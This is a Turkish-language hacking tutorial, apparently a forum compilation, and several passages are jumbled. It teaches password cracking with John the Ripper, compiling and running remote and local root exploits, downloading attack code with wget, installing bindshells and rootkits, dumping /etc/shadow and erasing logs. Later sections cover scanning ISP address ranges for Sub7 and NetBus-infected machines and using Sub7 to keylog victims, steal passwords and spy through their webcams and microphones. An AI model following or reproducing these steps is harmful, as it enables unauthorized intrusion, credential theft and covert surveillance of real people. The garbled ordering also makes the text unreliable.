yakalarsininiz.5 GB) ------John un wordlistli kirma komutu------john -wordfile:wordlist dosyasini buraya yazininiz -pwfile: sifredosyasini buraya yaziniz. islem bittinde bu dosyayi herhangi bir metin editöru ile acip bakabilirsiniz.Bu modda kayit dosyasi tavsiye etmem cunku uzun sure bi sey kirmadiginda anlayamaz.hasan-hasan98 gibi yada ayrintilarda amcuk insaat as yaziyorsa.Ayrica hic durmaz bu ctrl-break cekerek siz durduracaksininiz. Bu yuzden eger saglikli bi acc istiyorsaniz.Buraya all yazarsaniz tum karakterler.bu yuzden de ne zaman kapatmaniz gerektiini kestirmezsiniz. kirdiklariniz gider. Temel Komutlar bu kadar ha bide unutmadan BEEP olayi var yazdigimiz bu komutlarin herhangi birine -beep eklerseniz her sifre bulduunda pc . --------------Komut------------John -incremental:xxxx dosyaadi burdaki xxxx incremental in cesitidir. -------------------------şimdi gecelim Single Mod a-------------------Single mod da john amca sadece passwordu ile kullanici ayrintilari yada username i yakin olan sifreleri kirar. Sonradan bu kirilan acc leri tekrar cikartmak isterseniz john -show sifredosyasi yaziniz. Digits yazarsaniz sayilar(dogum tarihini sifre olarak kullananlar icin birebir). Bu da sizi wordlist kullanmaktan bi derece kurtarir ama asla wordlist kadar hizli diildir ve wordlist kadar cok kiramaz. ha bu arada son kisma kayit dosyasi yazdiimiz icin eger bi bokluk ciksa bile john bisey demicektir.sasirmayin herhangi bir hata falan verirse bunlarda o yazdigimiz dosyaya kaydedilecektir. yada kayit dosyasi kullanmadan yapin gerci tavsiye etmem.pot u bi sekilde kayberderseniz. -------------------------------incremental Mod---------------------------John amca incremental mod da o an rastgele karakter kombinasyonlari ureterek (eger ayar ellenmezse kafadan(default) 8 karakterdir) bunlari sifre olarak dener.Komut ise söyledir.

pl olanlarda perl dili ile yazılmış kodları içerir.hoparlörunden biiiip sesi gelir.. Biz ise sistemleri nasıl hackleyeceğinizi öğretiyoruz.pl uzantılı dosyalardır içinde kodlar vardır. Bi kısmıda Remote Root tur içeri düştüğün zaman id kısmında Root yazar.c ve ..h library ha! tası verecektir.. Exploitler kaynak kod halinde olduğu için bunlar Compile (derlemek) edilmelidir.. 2. Hem komut tabanlı kullanılıyor hemde bağlantı hızı oldukça .. Exploitleri compile etmek için 1 kaç seçenek doğuyor..c uzantılı olan dosyalar C dili ile yazılmış kaynak kodları içerir . Yüzeysel olarak anlatmak gerekirse Local attack uygularken sen olduğun makinadaki kısıtlı yetkini aşıp root olmak için uğraşırsın.. Zaten sistemi hackleyip kendi yönetimine alınca o sistemde bulunan siteler elinin altına gelmiş olacaktır. sistem derken shell veren bir makine yada web serverlarını kast ediyoruz..Biz turkiyeli oldugumuz icin yabancilarin yaptiklari wordlistleri kullanmayin ---------------------Bir Eklenti----------------www. Şimdi bu exploitleri yazan şhısların C dilini yalamış yutmuş sistemleri gözü kapalı anlatabilecek seviyede olan hacker lar ın yazdığınıda söylemek isterim. Bu remote Exploitlerin bir kısmı seni makineye düşürür sonrasında local root türü bir exploitle root yetkisine geçersin.. Tavsiyem shell dir. 1 Shell hesabı alarak oradaki gcc compilerini kullanabilirsiniz. Yada kendi bilgisayarınız herhangi bir Linux dağıtımını yükleyebilir komut satırını shell olarak kullanabilirsiniz.Remote Attack. Exploitler attack türüne göre 2 ye ayrılır. Bunlar haricinde assembly dili ile yazılmış olanlarda vardır.. Üzerine kurulu daemon ların açığını kullanarak yada local attack lar düzenleyerek sistemi sahiplenebiliriz.Ben bunu hep kullanirim. Bunun için remote türü attacklar la remote exploitler kullanılabilir. Bunun için local root exploitler kullanılır... ---------------------------Son-----------------------Ufak bir not: Wordlistler degisken olduklari icin bu sayfada yayinlanmamistir...Local Attack... Bunun için windows altında çalışan compiler lar mevcut olsada. Yani o şekil yazılır....ibm... Tabi burda genel konuşuyorum başka amaçlar içinde local Exploitler kullanılabiliyor. Linux makinedeki "gcc" Compileri bu iş için çok uygundur. Bu olayları gerçekleştirirken biz Sistem açıklarını kullanmamızı sağlayan minik progragramcıklar olan Exploit leri kullanırız. Exploitler in geneli Linux makinede Compile edilmek üzere tasarlanır. windows altında compile etmek isteyince .net ten sahte account alin orada baglanti programini da cekin. Kısaca mantık budur....... Authorization codu soracak size: (ibmbyob) yazin (ibmnet de yazabilirsiniz) ikinci bir yol ise alin su programi gidin internet baglantisi olan bir arkadasiniza yada internet cafe ye bu programi calistirip yildizli password un ustune dogru surukleyin SISTEM HACK & ROOTING Genel olarak herkes site hackleme peşinde koşuyor. Remote Attacklar ise Alakan olmayan bir makina örneğin bir web server burda senin account un yok bu makinaya local bir attack düzenleyemezsin.. 1... . ister kendiniz yapin ister bir yerlerden bulun.Yan odada Tv seyrederken Pc odamda sifre kirar ve biiip sesini duyunca pc nin basina kosarim hemen. Exploit Nedir: Exploitler genel olarak ..

c" Bu komutla http://ctrsapawn. " proFTPD kullanıor ve bu exploit sadece Gtk ftp kullanan host larda çalışır dio.kolayweb.... Önceki bir screen shot la yazımı aynen yazıyorum.net] [!] error: this exploit is only for GtkFTPd.c isimli dosyayı çekioruz yani wget komutu dosya çekmeye yarıor. "SSH" yi seçtikten sonra sağ alttaki "open" botonuna basın.. Putty Nedir : Putty Telnet/SSH Clientidir.kolayweb. .guncelturk. failed..c" Bu komutla Gtkftp_v1. Kullanılan port ve protokol .com/Apache_1../ : Çalıştırma komutudur... SSH güvenlidir. Hemen o kutucuğun altında "Protocol" seçenekleri var bağlanmak istediğiniz sistemin protokolune göre ordan birini seçeceksiniz SSH sunucusuna bağlanıorsanız "SSH" yi telnet sunucusuna bağlanıorsanız "Telnet" i seçeceksiniz.c) wget : Dosya çekmeye yarar. "Host Name ( or IP adress)" yazan kutucuğa shell inizin ip sini yazacaksınız. ".4.0...0....com/Ftkftp_v1. programı çalıştırın.3. Bi yerdir yani./Gtkftp" Komutu ile bu exploitle birlikte kullanabileceğim parametreleri gördüm. Yani exploiti çalıştırmayı denedim ama yetersiz parametre kullandığım için bana açıklama verdi kullanabileceğim parametrelerin bi listesini verdi. Shell Nedir : Shell Linux işletim sistemi kullanan bir makineden size verilen kısıtlı yetkilere sahip olduğunuz alan dır..com/Gtkftp_v1. ".cyberterrorz.cyberterrorz.Download bölümünde putty programı mevcuttur... Bu komutla bu dediklerim oluyo. Bizim bağlanacağımız sistem linux olduğuna göre ve bu sistem SSH protololu kullandığı için "SSH" yi seçiyoruz.c isimli exploiti derliyoruz... (örnek: ls ) rm -rf dosyaadi : belirttiğiniz dosyayı siler.4..com sitesi üzerine bu exploiti çalıştırmayı denedim ama verdiği uyarıda www.iyidir.cyberterrorz.... (örnek: wget http://ctrspawn.Bu komutları sırayla açıklayalım.. Shell kvramını bilmeyenler için açıklamak istiyorum.com" Komutu ile www.. Bu alana putty programı aracılığı ile bağlanılabilir... (örnek: rm -rf apache.. ls : olduğunuz dizindeki dosyaları listeler.. Bu kısım anlaşılmıştır umarım... Biz genellikle bunu exploit kodlarını derlemek için kullanacağız (örnek: gcc -o Apache Apache_1. Porttur..220 ProFTPD 1....../Apache) Exploit Compile Nasıl yapılır : Şimdi Shell imiz var ve putty programı ile shell imize bağlandığımızı var syarak anlatıyorum.x... Shelle bağlanmış olacaksınız.... birazda putty programına değinelim.c) . Pass inizi isteyecek onuda yazıp enterlayın.4. Kullanımı oldukça basittir..4. "gcc -o Gtkftp Gtkftp_v1./Gtkftp -h www.... Önceden hazırladığım kısa bir yazımı aynen yazıyorum..0.. bunları örneklerle açıklayacağız. Bu Shell hesabına ircd kurulabildiği gibi exploit compile olaylarıda yapılabiliyor....0.x. SSH protokolu ve 22.com sitesi "<.. telnet gibi değildir yani.. Öncelikle kullanacağımız 3-5 temel komutumuz var.kolayweb. (örnek: ... Bu programla telnet ve SSH sunucularına rahatlıkla bağlanabilir komutları program üzerinden girebilirsiniz...2.c) gcc -o : C dilinde yazılmış programları derleme komutudur.7 Server (ProFTPD) [OEI.. Şimdi putty i download ettikten sonra.. Burdaki Altı "Kırmızı" renkle çizilmiş olan lar kullandığım komutlardır. Şimdi Linux makinaya bağlanmış olduğumuza göre bi kaç lin! ux komutundan bahsedeyim. "wget http://ctrspawn.......3... Önünüze siyah bir ekran çıkacaktır buraya Shell username inizi yazın enterlayın. ama derlenmiş olan exploiti Gtkftp adında kaydediyoruz...

Kulandığım komuta gelince...com is running Apache/1.20 (Unix) (Red-Hat/Linux) mod_ssl/2.. Exploit Kullanarak Sisteme girmek : Önceki yazımda anlattığım ve screenshotunu aldığım bir remote Attack 'ım olmuştu. Ama öncelikle yazma iznimizin olduğu bir klasöre girelim genel olarak /tmp/ dizininie yazma iznimiz vardır bazı sistem yöneticileri bunuda kaldırıyor ama nadir olan bi olay... Exloit compile etme ve çalıştırma olayıda açıklığa kavştu Şimdi bir sisteme nasıl girilir onu görelim. Normal de Shell hesabı olanların /home/ dizini altında bir klasörü olur. Bu konu ile ilgili tüm sorularınızı forumlarda sorabilirsiniz.9. Bunun için öncelikle bir hedef belirlemem gerekiyor.. 2..8. 6. 3. 4. işlem sırasına gelince.....(bunu loglara kayitlanmamak için yapiyoruz ve ayrıca shelin kapatilmasi söz konusu olabilir.. Exploiti çektim çalıştırdım.... ama anonymous bir shell...24_01 on Linux.....com serverlarına gireceğim..Gerekli exploiti temin etmek..... 7350 exploiti kaynak kod halinde deil derlenmiş halde dağıtılıyor ayrıca eski bir exploittir... www.XXXXXX. Ben bu sisteme dökümanı yazmadan önce girmiştim. Ama bi süre sonra Read Error verip bizi düşürecektir.. Şimdi en can alıcı noktaya geldik.Servera bindshell kurmak.. 1.... id mizde nobody yada farklı bişey yazar. Screenshot un sonunda yazan yazılar gelince bi süre bekledikten sonra shell e düşürecektir. The site www. Exploit brute force yöntemi ile çalışıor.www........ 5.Sonraki işlemler.XXXXXX..netcraft. Tmp dizinine geçmek için "cd /tmp" komutunu uygulayın. Ben brute force un etkili olduu kısmı direkt yazarak kısa yoldan sisteme girdim..Loglari silmek İşlemleri sırasıyla yapıyorum.Shell e login oldum......7350 fun Exploit i ile bu servera girebilirim.HPbindshell i kurdum. Bind Shell kurulumu : Şimdi sisteme bindshell denilen bi çeşit trojan niteliği taşıyan bir program kurmak gerekecek.... 5. amacı sistemdeki belirli bir portu bindshell olarak açması ve buraya bağlanmayı sağlamasıdır.. bindshell kuruyoruz çünki her zaman exploiti kullanıp sisteme remote attack düzenlemek zorunda ...... bindshell türü programcıkları download bölümünde bulabilirsiniz.Server infosunu aldım.6 PHP/4....Rookit kurmak (binshelle idare ederim diyorsanız gerek yok) 6.. 4.Şimdi screenshot u yayınlayacam... Yukarda örnekle gösterdiklerimi şimdi uygulamaya dökeceğim.4pl1 mod_perl/1.. 7350 yi hebele olarak shell e kaydettim..Olay bundan ibaret screenshot u iyice inceleyin bi çok kısmı anlayacaksınız zaten.... bu Anonymous girişte bu dizin altında klasörümüz olmaz.ptrace-kmod exploiti ile serverda root oldum. Exploitle içeri düşünce bi nevi shell hesabımız oluyor o makinada.... yada sitemizde werdiğimiz scan_projecti kullanarak httpd server infosuna bakmak.Shell 'e login olup gerekli exploiti shell e çekmek ve kullanmak. Gerçi klasör olayı root a bağlıdır ama geneli böyledir.... Kullanılan server bilgileri şöyle.3...4 OpenSSL/0. Aslında istesek bu şekilde shell kullanarak oraya girebiliriz..com sitesinden server infosunu almak. dolayısıyla bazı yerleri atlamam gerekiyor.O yüzden bindshell türü bir program kurarak bu sorunu hallederiz.0. 3.Serverda root olmak.. 1.Bu sistemde bu açık hala mevcuttur. 2..

Neyse bindshell kurulumunun anlatılacak bi tarafı yok ... Önceden program yazarı port listi programa girmiştir açık port a denk gelen text i ekrana yazar... Eşsiz bir scannerdır.... Sonuca ulaşmak.. Unutmayın Her türlü Sorununuzu yada probleminizi kafanıza takılan her şeyi Forumlarda Sorabilirsiniz. nmap ın ping türü taramasıda ayn! ı sekilde çalışır yanlız açık bulduğu portu listeden değil ne amaçla kullanıldığını tespit edip söyler.. Her zaman Exploitin sonuç vereceği kesin değildir açık patch lenmiş olabilir. "uname -r" Komutu ile kernel in sürümü öğrenilip buna göre local root exploit uygulanabilir yada "ps x" gibi komutlarlada çalışan uygulama ve programlara görede bakılabilir. ping türü taramalar server ın loglarında görülür. Sistemdeki Şifreleri almak için "cat /etc/shadow" komutunu uygulayıp /etc/ dizini altındaki "shadow" isimli dosyanın içeriği ekrana basabilir shadow pass leri alabilirsiniz. portu açık buldu port list te ne 21.... Nmap programını duymuşsunuzdur..../bindshel deyip kurulur. "System hack & Rooting" Bölümünde var olan bu dökümanı okuyabilirsiniz. Normal port tarayıcıları ping mantığı ile çalışır sırayla tüm portlara ping atar ve pong gelirse yanıt almış olur ve bu portu açık söyler. Girmek istediğimiz sistem hakkında bilgi toplamak için en uygun araçtır. Sistemde bir hesabınız olursa remote attack kısmını eleyip local attack yöntemlerine bakarsınız olay bu.. Ama sürekli yanlış yönlendirme işin kolayına kaçma ve ezber olaylar yeni yetişecek gençlerin gelişimini olumsuz etkiliyor. Öncelikle bir remote attack düzenledik sisteme girdik... ICQ uin lerinin yada irc serverlarına clone sokmanın hacker lık yada bu işleri yapana hacker denildiğini zanneden kardeşlerimize yol göstermeye çalışacağım......... çünkü biz site hacklemiyoruz. Sonrasında sistem hakkında biraz bilgi alarak siste! min nasıl rootlanacağına bakılır...... Burada dikkat edilecek nokta bu scanner herhangi bir açığı scan yapmıyor. O eskiden kalan cgi scanner vs. Bize lazım olacak hemen hemen her şeyi bu programla bulabiliyoruz..... türü scannerları beyninizden silip atın. namp Linux altında çalışan komut tabanlı bir scannerdır. Bir Saldırı Anatomisi... Şimdi ise bir local attack düzenleyip root olmaya çalıştık. port a denk gelen yazı neyse onu size söyler.... Günümüzde Hack olayına duyulan merak ve ilgi oldukça fazla ve günden günede artıyor. ama nmap ın en müthiş özelliği olan SYN Stealth tarama % 90 oranında loglarda gözükmüyor. Root olduktan sonra sisteme bir rootkit kurarak gizli giriş çıkış yapabil! iğrsiniz..Mail account larının ele geçirilmesi.. Öncelikle asıl konumuz bir sisteme erişebileceğimiz yolları görmektir ki buda hackerların izlediği bir yoldur. işlem sırası o şekilde ilerliyor. Şimdi şu kısıma dikkat edin. hangi porta hangi ip den ping atıldığı log larda belli olur.. ve Exploitlerin kısa sürede sonuç vereceğide kesin değildir.. Bilgileri değerlendirebilecek materyallere ulaşmak.a) Nmap kullanmak... Zaten site hacklenmez deface edilir... kalıntılar olabiliyor ama güvende olduğunuz hemen hemen kesindir. Materyalleri sırayla kullanmak..kalmayalım diye.. Örneğin 21.. Burada biraz Linux bilgisi ister..... sistemde yüklü olması gerekir ve hemen . Derinlere girmeyeceğim serverda çalışan daemon ları açık portları ve bu daemon ların sürümlerini verebilen SYN Stealth.. 1234Sistem Hakkında olabildiği kadar bilgi toplamak.. Önce sisteme girmek gerekir sonra local bir attackla sisteme sahip olamk gerekir. ping türü scan yapabilen tam bir hacker aracıdır. Hacker lamer cracker gibi kavramları anlatmayacağım ama hacker ların izlediği yolu ele geçirmek istediği sistemi nasıl hacklediklerini anlatmaya çalışacağım. Rootkit olayını ManiaC arkadaşımız anlatmış güzelce.. Programın özelliklerine gelince. ama sistemde root olduktan sonra ne gereği varki zaten sistemdeki istediğiniz her dosyaya her siteye erişim sağlarsınız...... 1.

... Bu dökümanı okuyan şahısların bu derecede olmadığına göre biz exploitlere ulaşmak için gerekli web adreslerini vermekle yetineceğiz.securityfocus. cd . Burada uygulanacak adım browser a aldığınız siteyi ve phpshell dosyasının path ini yazmaktır örneğin : www. permission verilmişse kullanırsınız bu iş kasar biraz. portu kullanan daemon un infosunu ve üzerinde çalışan modülleri listeler. Bu durumda karşı sistemden bir ftp accountu alınır bir host yani. ..php yazdıktan sonra açılan sayfada komut satırına "cd /tmp.. ip yazan kısıma Hacklemek istediğiniz sistemin ip adresini yazacaksınız. ve bir Türk arkadaşımız yazdı. mkdir .....h" komutunu uygulam! aktır.....com gibi security içerikli sitelerde gerekli materyallere ulaşılabilir. 2.nl .....Sonuca ulaşmak .. Bu program shellde çalışabiliyor. Bu durumda bir Local attack uygulanacaktır.. Sonuçlarda apache daemonu versiyonu ve müdüllerini bulduk diyelim.. Genelde bu yöntem remote attack lara göre daha etkili sonuç verir. PORT STATE VERSION Başlıkları altında açık port statüsü ve kullanılan daemon ve versiyonları yazıyor.. serverın safe mode off konumunda çalışması gerekir ki % 90 serverlar bu şekilde çalışır.... Girmek istenilen server ın Linux olduğunu var sayıyorum..cyberterrorz. Bulduğunuz exploitleri bir shell de compile edip kullanabilirsiniz. serverlarda olur ama sizde de olması gerekir. Konsol da "nmap" yazarsanız size uzunca bir arguman çıkartacaktır. incelediğiniz zaman ne kadar fonksiyonel bir scanner olduğunu göreceksiniz.b) Scan Project kullanmak..Ulaştığımız bilgileri değerlendirecek materyallere ulaşmak. fazla bilgi göz çıkarmaz........com adresi bunun için yapılandırıldı. bu modüllerinde açıkları vardır bize lazım olabilir diyerekten sonuçları alalım.. phpshell. Bir Hacker bu bulduğu sonuçlara göre exploit yazabilen birisidir O bulduğu statü versiyon daemon lara göre oldukça risk gerektiren sonuçlar üretebilir. 3.. ingilizce dil bilmenin bu olayda çok büyük olumlu etkisi olacaktır.. Bu sonuca göre çalışan daemon açıklarını kullanıp server 'a girme yollarını denemek gerekecek..php isimli bir dosya vardır bu dosya browser üzerinden server a komut işlemeye yarar. www. program . Çünkü shell lerde nmap kullanamazsınız root yetkisi ile çalışır. mod_mylo... Burda amacımıza ulaşmış oluyoruz. biz sade! ce "nmap -sS -T4 -F -A -O ip" komutunu kullanacağız.... Ki hacker lar mutlak sonuç alır ama bulabileceğiniz materyaller public olduğu için girmek istediğiniz server da açıklar patch lenmiş olabilir..c uzantılı code halindedir.. bu komut /tmp dizin altında "h" adında bir gizli klasör oluşturur.. Ama buna gerek kalmadı www. Biliyorsunuzki apache daemon u modüller le birlikte çalışır.. Ama bu önümüze çıkan şeyler ne işe yarayacak ? Bu sonuçlarda .. Linux işletim sistemi kullandığınızı var sayarak anlatmaya devam ediyorum. bu klasöre bindshell açan bir dosya çekip çalıştırmak gerekecek sonra putty ile bindshell portuna bağlanıp local root exploitle sistemi rootlamak gerekecek. Scan sonucunu almak için bi süre beklemeniz gerekecektir.packetstomsecurity. Ulaşabileceğiniz tüm materyaller bu sitede mevcuttur..com/phpshell.. 1. www... mod_perl vs.Materyalleri Sırayla Kullanmak Remote attack için ulaştığımız bu sonuçlar ve bulduğumuz tüm materyalleri shellde denemek gerekir. 4. mod_ssl...site.. vs. port açıksa bu portun infosunu alarak 80. eğer bir sonuç alınamadıysa. Tarama sonucuna bakınca bi sürü yazı yazdığını göreceksiniz.. Sistemde shell verilmediği büyük bir olasılık taşır bu durumda ftp ile bir local attack uygulayacağız. Bu hostumuzda php destekleniyordur... gcc komutu ile derlenip kullanılabilir. Yaptığı işlem kolay 80.h. ihtiyacnıza göre parametreleri düzenleyebilirsiniz.hemen tüm server larda default olarak Linux la birlikte kurulu olur. en ideali Linux bir makineye sahip olmanızdır.

All ports from la tüm açık portları taratabilirsiniz.Sonuç dediğimiz nedir ? Sisteme girmek için bir nedenimiz olması gerekir değilmi.Yanlarında artı olanlar trojanlı pc ler..255 gibi büyük bir ip aralığı tarattınız önünüze tahminimce en az 5000 civarı aktif pc çıkacak yani tahminen 5000 civarında aktif pc içinde trojan arayacak bulabileceği trojan sayısı o andaki duruma göre 20 olur 5 olur hiç olmaz 30 olur her neyse tarama bittikten sonra Expand all butonuna basıyoruz yanında + işaretli yani aradığımız trojanlı pcler açılıyor. Evet en kullanışlı en seri şu anda emsali olmayan ücretsiz Super Scan ın sadece trojan bölümü için anlatılması gereken kısmı bu.175. Çok kısa bir zaman dilimi içinde kaç tane trojan bulmak isterseniz binlerce pc yi tarayarak önümüze getiriyor.Evet trojan listesi önümüze geldi ve birçok sayıda trojan ama biz bunların hepsini taratmak istemiyoruz hepsini taratmaya kalkarsak çok zaman alır.. Clear All butonuna basıyoruz trojanların yanındaki işaretlerin hepsi kalktı Schoolbusu taratmak için 54321 portu sub7 için 27374 ü Netbus pro için 20034 ü işaretliyoruz ben üç tane trojan seçtim siz sadece Schoolbusu veya subu veya istediğinizi seçebilirsiniz.Daha birçok özelliği mevcuttur SUB7 KULLANIMI . SUPER SCAN PROGRAMI KULLANIMI Hostname Lakup:Buraya hangi ip aralığını taramak istiyorsak sadece bir tane ip numarası giriyoruz Lakup a tıklıyoruz bilgisayarın hostu bağlantı adresi çıkıyor yazdığımız ip o an nette değilse herhangi bir şey yazmıyor.249. artılara teker teker basabileceğimiz gibi scan işleminin bittiken sonra da tıklayabilirir.Starta basıyoruz. Daha sonra Prune butonuna basıyoruz ekranda sadece aradığımız trojanlar kalıyor diğer binlerce işimize yaramayan pc listesi kayboluyor ve trojanlı ipleri teker teker clinte giriyoruz.. diyelimki aynı anda schoolbus-Sub7-Netbus pro trojanlarını taratmak istiyoruz. Eğer çok büyük ip aralığı tarayacaksak Starta başlangıç ip no elle giriyoruz. 1-255 ip aralığı tarattırmak istiyorsak.1 / 195.175.. O ip aralığını seri bir biçimde tarıyor Active host kısmı o ip aralığında aktif nete bağlı durumdaki pclerin sayısını gösteriyor Open ports ise bize gerekli olan kısım yani aradığımız torojanların o ip aralığında kaç adet olduğunu gösteriyor.Stop a bitiş ip no yine elle giriyoruz.Sadece 1-255 aralığı taratacaksak yukarıya her seferinde ip numarası yazmaya hiç gerek yok PrevC Geriye doğru 1-255 aralık arama NextC ileriye doğru 1-255 ip aralığı tarama bu butonlara basmanız yeterli.ip kısmının altında 1.101. Tüm açık portları çok kısa zamanda bulur telnetten bağlanır.Seçtikten sonra OK butonuna basıyoruz evet hayır geliyor hayırı işaretliyoruz.Tanıdığım hiç bir hacker deface ypatığını görmedim.254 butonuna tıklıyoruz. Amaç denilen şey o makinede bulunan bir bilgi bir log yada bir dokumandır. Port List Setup butonuna basıyoruz Port List File kısmından trojanı seçiyoruz.Sizinde amacınız bu olsun sisteme zarar vermenin yada boy gösterisi yapmanın hacker lıkla alakası yoktur.Tekrar ana sayfaya döndük. Hiç tavsiye etmem Scan işleminin bitmesini bekleyin ip arama bitince diyelimki 195... Bir hacker neden bir sisteme girer deface içinmi kesinlikle hayır.

Zipli dosya içinde 3 exe dosyası birlikte gelecektir. Bunlar Subseven.exe Editserver.exe ve server.exe dir. Bu dosya lardan Server.exe yi kesinlikle kendi bilgisayar ınızda açmamanız gerekiyor. Aksi takdirde kendi kendinizi infecte etmiş olursunuz ve trojan sizin bilgisayarınıza yerleşir. Önce subseven.exe ye tıklıyoruz. Karşımıza subseven ın açılış menüsü geliyor. Şimdi Subseven trojanı bulaşmış bilgisayarları bulmaya çalışacağız. Connection Bölümüne tıklıyoruz ve çıkan menuden ip scanner ı seçiyoruz. Burada start ip ve end ip aralığına Türkiyedeki internet servis sağlayıcılardan birinin ip aralığını yazıyoruz. (örneğin; 213.43.50.1 - 213.43.255.255) Daha sonra port kısmına subseven in portu olan 27374 ü yazıyoruz. Delay sayısını yükseltirsek daha ayrıntırılı ama daha yavaş bir arama yapar. Daha sonra start a basıyoruz. Bir süre sonra bir kaç tane ip numarasının bulunduğunu göreceksiniz. Bunlar subseven trojanı bulaşmış bilgisayarlardır. Bunlardan birisini yukarıdaki ip/uin kısmına yazıyoruz ve connect e basıyoruz. Ve karşımıza şifre soran bir kutucuk çıkacak. Eğer bu bilgisayar daki trojana şifre konmamışsa OK ye basdığı mızda bağlandığımıza göreceğiz. Ve alt satırda connected 21:25.21,Kasım 19, 2000, Pazar, version: BoNuS 2.1 gibi bir yazı çıkacak. Artık kurbanımızın bilgisayarına girdik. Şimdi başka neler yapabiliriz onları görelim. <!--[if !vml]--><!--[endif]--> * Connection Get pc info: Buradan karşı bilgisayar hakkında bilgi alabilirsiniz. Cleant connection victim e kaç kişinin bağlı olduğunu gösterir. İlginç ama bu değer bazen 4-5 olabiliyor. Get home info: Kendi bilgisayarınız hakkında bilgi verir. Server options: Server ayarları yapmanızı sağlar. Portunu değiştirebilir (change port), Portu default port (27374) olarak ayarlayabilir (set default port), Şifre koyabilir (set password), Şifreyi silebilir (remove password), internet bağlantısını koparabilir (disconnect victim), Server ı yeniden başlatabilir (restart server), server ı silebilir (remove server), server ı bilgisayar yeniden açılınca tekrar açılacak şekilde kapatabilir (close server), Server ın yeni sürümünü kendi bilgisayarınız dan veya internette yerleştirdiğiniz bir site den yenileye bilirsiniz (update server from local file / URL file). Ip Notify: Subsevenın engüzel özelliklerinden birisi, kurbanınız internete bağlandığında burada yapacağınız ayarlar sayesinde size icqdan, mİRC den bir kanala veya bir nicke, veya email adresi nize uyarı mesajı geliyor. * Keys/messages Keyboard: Victim ın klavyesiyle yazdığı herşeyi buradan görebilirsiniz. Chat: Buradan kurbanınızla (uyandırmamak için tavsiye etmem) veya ona bağlı diğer bilgisayarla chat yapabilirsiniz. Matrix: Matrix i aktive ettiğinizde victim ın bilgisayar ekranını tamamen kaplayan ve onunla chat yapmaya yarayan bir görüntü çıkıyor Msg menager: Buradan victim ın bilgisayar ekranında çıkacak değişik mesaj ayarları yapabilirsiniz. Yaratıcılık size kalmış . Spy: Victim İcq, Aol, Msn ve yahoo mesanger gibi chat programlarından birini kullanıyorsa ona gelecek olan mesajları buradan gözetleyebilirsiniz. İcq takeover: Buradan daha önce kullandığı veya şu an kullanmakta olduğu icq uin lerini bulup bunları kendi icq dosyanızın içine download edebilirsiniz. Bu sayede victim in icq dan daha önce yaptığı bütün konuşmaları ele geçirmiş olacakınız. Takeover işlemi biraz uzun sürebilir. Bittikten sonra kendi icq nuzu yeniden başlatın, sonra icq da change active user menüsünü kullanarak victim ın kullandğı icq ya geçebilirsiniz. Mesaj arşivindende daha önce yaptığı konuşmaları okuyabilirsiniz. <!--[if !vml]--> <!--[endif]-->

* Advenced Ftp/http: Victim a ftp açarak Subseven clienti kullanmadan da bağlanabilirsiniz. Find files: Dilediğiniz formattaki dosyaları burdan rahatca bulabilirsiniz.

Password: Buradan victim ın bilgisayarında kaydedilmiş olan çeşitli şifreleri ele geçirebilirsiniz. Reg edit: Victim ın regisry editor unu açıp oynama yapabilirsiniz. App redirect: Çeşitli dos komutlarını victim ın bilgisayarınızda çalıştırabilirsiniz. Port redict: Açık olan portlarını görüp bunlara ekleme veya çıkarma yapabilirsiniz. * Miscellaneous File manager: Bütün dosyalara burdan ulaşıp download, upload, ve daha birçok şey yapabilirsiniz. Window manager: windows altında çalışmakta olan programları buradan görüp onlarda oynamalar yapabilirsiniz. Text-2-speech: Buradaki kutuya yazacağınız yazıları victim ın bilgisayarında sesli olarak okutabilirsiniz. Ama bunun için önce text-2-speech plugin ini kendi bilgisayarınıza yüklemeniz gerekiyor. Clipboard manager: Şu an çalışmakta olan programları görüp istediğimizi kapatabiliriz. İrc bot: İrc bot açabiliriz. Bununla ilgili geniş bilgi zip dosyası içinde txt olarak var. * Fun menager Desktop/webcam: Burada victim ın bilgisayarının ekran görüntüsünü alabilirsiniz. full screen capture yi kullanırsanız bir defalık görüntü alırsınız, open screen prewiev i kullanırsanız sizin belirleyeceğiniz aralıklarla sürekli görüntü alırsınız. Ayrıca buradaki kutuyu yanlarından ne kadar çok büyütürseniz görüntü kalitesi o kadar netleşiyor. Ve aşağıdaki allow mouse clicks kutcuğunu da işaretlerseniz. size gelen ekran görüntüsü üzerinde yapacağınız tıklamalar victim in bilgisayarına yansıyacaktır. webcam/quickcam capture bölümü trojan olayının ne kadar ciddi bir olay olduğunu gösteriyor. Buradan eğer kurbanınızda web kamerası varsa kendi görüntüsünü hatta odasındaki görüntüyü bile kaydedebilirsiniz. Evet yanlış duymadınız <!--[if ! vml]--> <!--[endif]--> Flip screen: Bu özelliği kullanarak bilgisayarın ekran görüntüsünü yatay ve/veya dikey düzlemde çevirebilirsiniz. Print: Yazıcı dan herhangibir yazı çıkarabilirsiniz Browser: Buraya yazacağınız herhangibir web sayfasını karşıki bilgisayarda açabilrsiniz. Resolution: Buradan ekranın çözünürlüğünde oynama yapabilirsiniz. Win colors: Buradan windows un renklerini değiştirebilirsiniz. * Extra fun Screen savers: Ekran koruyucuyu değiştirebilirsiniz. Restart win: Windowsu çeşitli şekillerde kapatabilirsiniz. Mouse: Mouse ayarlarıyla oynayabilirsiniz. Sound: Kurbanın odasından ses kaydı yapabilir veya ses ayarları ile oynayabilirsiniz Time/dite: Bilgisayarın tarih ve saat ayarlarını değiştrebilirsiniz. Extra: Burada cd romu açıp kapama, monitörü açıp kapama gibi extra özellikler mevcut. Local options: Local options bölümünde de subseven ın kullanımı ile ilgili ayarlar yapılmaktadır

SpyMasterSnake FTP Trojan Help Dosyası

SpyMasterSnake FTP Trojan (SFT), aslında çok basit bir mantık üzerine hazırlanmış olsada, tam verimle kullanılabilmesi için iyi derecede bilgisayar ve FTP bilgisine sahip kullanıcılara gereksinim duyar. SFT, başlı başına hem bir Unix işlevli FTP serverı hemde Windows tabanlı (Win9x,WinME,WinXP,WinNT,Win2K) bir Trojandır. SFT'nin esas yapılma nedenleri arasında, Herhangi bir önceden belirlenmiş, hazırlanmış, Client'e ihtiyaç duymadan, Bir Trojan'ın özelliklerini kullanmak ve aynı zamanda bir FTP server'ının dosya transferlerindeki hızından ve gücünden istifade ederek, açıldığı bilgisayarı bir FTP server'ına dönüştürüp, makinede olan biteni, görsel, işitsel ve yazılı olarak, Trojan sahibine yollamaktır. SFT içinde bir çok işlevi bulundurmaktadır. Bunlardan başlıcaları şunlardır: • Unix Type FTP Server. Her türlü dosya transferi işini en kısa ve kolay yoldan yapabilmektedir. Mesela: Kalınan yerden download'a devam edebilme, kalınan yerden upload'a devam edebilme, aynı anda bir dosyayı parçalayarak alma, aynı anda bir dosyayı parçalayarak upload etme, V.s. gibi. Keylogger 